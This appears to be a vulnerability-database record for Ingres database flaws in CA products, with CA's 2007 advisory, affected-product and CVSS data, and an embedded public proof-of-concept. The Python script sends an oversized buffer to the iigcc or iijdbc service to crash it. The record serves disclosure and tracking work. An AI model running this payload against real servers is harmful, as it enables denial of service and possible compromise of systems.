var-200706-0397
Vulnerability from variot
Multiple "pointer overwrite" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or overwrite files. CA has issued fixes, to address all of these vulnerabilities, for all supported CA products that may be affected.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function.
6) Communication server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the communications server (iigcc.exe). This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023.
7) Data Access/JDBC server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the Data Access server (iigcd.exe) in r3 or the JDCB server in older releases. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0397",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "r3"
},
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2006 9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "and 2.5"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:database_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3336",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2007-3336",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3336",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2007-3336",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-389",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \nTitle: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed \nIngres Multiple Vulnerabilities\n\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\n\nCA Advisory Date: 2007-06-21\n\nReported By: NGSSoftware, and iDefense\n\nImpact: Attackers can potentially execute arbitrary code, or \noverwrite files. CA has issued fixes, to address all of \nthese vulnerabilities, for all supported CA products that may be \naffected. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. \n\n6) Communication server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the communications server (iigcc.exe). This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. \n\n7) Data Access/JDBC server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the Data Access server (iigcd.exe) in r3 or the JDCB \nserver in older releases. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base 